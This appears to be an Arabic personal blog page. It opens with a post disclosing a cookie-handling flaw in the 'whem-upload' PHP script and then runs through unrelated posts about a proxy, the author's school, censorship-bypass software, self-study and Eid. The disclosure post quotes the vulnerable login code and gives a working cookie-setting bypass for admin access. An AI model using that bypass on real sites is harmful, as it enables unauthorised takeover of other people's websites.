whem-upload Insecure Cookie Handling Vulnerability.

كنت عم دور على سكربت لرفع الصور.

وجدت whem-upload

نزلته و جدت مشكلة فيه و انا عم حلها اكتشفت فيه ثغرة
و هي اول مرة بحياتي بلاقي ثغرة بسكربت

ارجو من الكل ان لا ستخدمها في إيذاء المواقع الاخرى.

انا مالي مسؤول عن اي ضرر بصيب المواقع من جراء كشفي للثغرة.

بعتت رسالة لصاحب السكربت وحيد ومارد الحق عليه إذا صار شي.بتمنى من الكل أنو ما يستخدموها لاختراق المواقع

النقل مسموح مع ذكر المصدر.

////////////////////////////////////////////////////////////////////////////

---------------------------
wehm-up 1.0 I.Cookie Hand.
---------------------------
Author: Adnan ( zizo.h)
Email: a-homssi@scs-net.org
Download: up
---------------------------
Bug In: \login.php

$user = $_POST['user'];
$pass = $_POST['pass'];
if ($user == “$mem_user” and $pass == “$mem_pass”){
setcookie(“mem_user”, “$user”, time() + 1000);
setcookie(“mem_pass”, “$pass”, time() + 1000);

Exploit:
login:
admin/login.php
javascript:document.cookie = "whem_Name=admin; path=/";
javascript:document.cookie = "whem_Password=admin; path=/";

then \admin\index.php # So Easy To Hack  

Greetz:All No_Hack Members,Sniper-Sa;
///////////////////////////////////////////////////////////
لأي استفسار الرجاء مراسلتي.
سلام.

إلى شركات الاتصالات(Syriatel,Mtn,…)

مشاكل شركات الاتصالات في سوريا و…..

نقل عنوان المدونة

تم نقل المدونة إلى عنوان اخر منذ فترة

المواضيع الموجودة هناك ليست موجودة هنا

الرابط الجديد

php proxy سريع من إنتاجي

السلام عليكم,لقد ركبت script php proxy على مساحة أخذتها من سيرفر رفيق لي له جزيل الشكر.

و البروكسي سريع جداً بس ادخلت عليه الكثير من الدعايات للتجربة بركي برحلي شي قرش سوري هه هي إذا طلعلي شي .

هو الوحيد الشغال بفعالية على سيرفر فأكيد حيكون سريع.

الرابط: أسرع بروكسي اي شخص توجد له ملاحظات ينبهني عليها.

سلام.

مدرسة اللايك -1-

انا قلت من قبل أني سوف أضع موضوعاً عن مدرستي اللايك (معهد الشهيد باسل حافظ الأسد) معهد الحرية مسبقاً.

المدرسة أحوالها تدهورت كتير و جاء عدة مدراء جداد و في هذه السنة اتى مدير جديد.كتير نظامي و هلأ اول عهدوا بقى عم يقول انو بدو كذا كذا و … ,تجهيزاتها صارت كلها خردة, المقاعد كلها منيحة ماعدا مقعيدة ثلاث سنوات على التوالي و انا بقعد بمقعد مايل و بلا درج الله يعين و اخر واحد. المهم:

الاساتذة المنيحة كلها راحت مثل :نمر,يشوع,حمصي,… و بقت الاساتذة اساتذة الفرنسي القدامى الذين لهم جزيل الشكر.

مثل مادام شار يعني أحسن شي أنسات الفرنسي.اما بقية الاساتذة ,في شي منيح و في شي لأ. الاساتذة الحاليين مع احترامي للجميع بس انا عم احكي هيك ميشان تفهموا يلي عم ينحكا عنهم بالغنية و الفيديو  (فقط يلي انذكروا فيون):

سليم زيدان(عربي):بدخن كتير و ما بتفهم شي بحصتوا(الطلاب بجننوه).

فندي(تاريخ و جغرافيا):بطل الأبطال الاستاذ الخارق الجبار الخطير,الكشاش الكبير:ولا مرة درسني بس بيحكوا عنوا, من كشاتوا:

مر من تحت ايدو صاروخ , كان بالحرب نزل مظلي بشاحنة للأعداء(غير متأكد منها),ضرب واحد بوكس قام هرت عينوا قام لحقها و ركبها,كل كذباتوا بايخة و العالم بتحكي عليه.

ريشة(علوم طبيعية),عضم(فرنسي -مادرسني-),فياض(تاريخ و جغرافيا)…

الاستاذ رجب (رياضيات للثانوي)راح من كم سنة:لم يعرف ملمس الطبشورة(الحوار)طيلة حياته.

مهلاً:لماذا تكتب هكذا؟هيك الأساتذة بيعرفوك و بيتحططوا عليك!.من أجل شرح وضع مدرستي الحالي للي كان فيها.

بالفترة الأخيرة في طلاب قد انشأوا فيديو , و غنية, انا مالي علاقة لا بهي و لابهي بس رفعتهم و سوف أضع رابطهم-هنن ليس حلوين كتير بس شوفوهم.

في كتير عالم سوف يقولوا لي لماذا كتبت بالغة العامية,لأنو الموضوع ما بهم غير يلي كانو بالمدرسة و بيفهموا بالعامي

التحميل:

الفيديو: فيديو لمدرسة اللايك

الغنية أسلوبها راب: تحميل

سلام.

برنامج Hotspot Shield لفك حجب المواقع

برنامج Hotspot Shield لفك حجب المواقع

التعليم الذاتي!!!

كثيراً ماترد مواضيع حول كيفية تعلم لغة البرمجة الفلانية وخاصة java لأنو مافي غير كم كتاب عربي و مالون منشورين منيح و ما في شي شامل.و بتتوارد الأسئلة من هنا وهناك: كيف بدي إبدأ اتعلم….,,أريد كتاب بالعربي حول….,تجد الشخص يريد كل شي  على طبق من فضة و لا يحاول أن يعتلم من المصادر الانكليزية و في كتير مواقع مفيد مثل:

مكتبة انكليزية,    موقع أكواد برمجة لكل شي و خاصة C++.

من افضل السلسات التي افضلها في تعلم لغات البرمجة في البداية Sams teach your self.

بالنهاية بحب اشر انه  من غير الضروري أن يتواجد أحد يعلمك.هي عندك مثال انا( مو شوفة حال)تعلمت كل شي لحال ما دخلت لا دورة و لاهم يحزنون بس في مشكلة الشهادة لأنه بالشغل لا يعترفون بالتعليم الذاتي و يطلبون شهادة معترف فيها.

في كتب عربية كتير بمصاري (كتب مطبوعة) أغلبيتها مترجمة. يعني بس حبيت نبه لهذه الناحية.

سلام.

كل عام و انتم بخير (أضحى مبارك)

كُل عام و أنتم بخير بُمناسبة عيد الأضحى المُبارك
و إنشاء الله بيرجعوا الحجاج بسلام, ونكون منهم المرة الجاية (انا مطول  )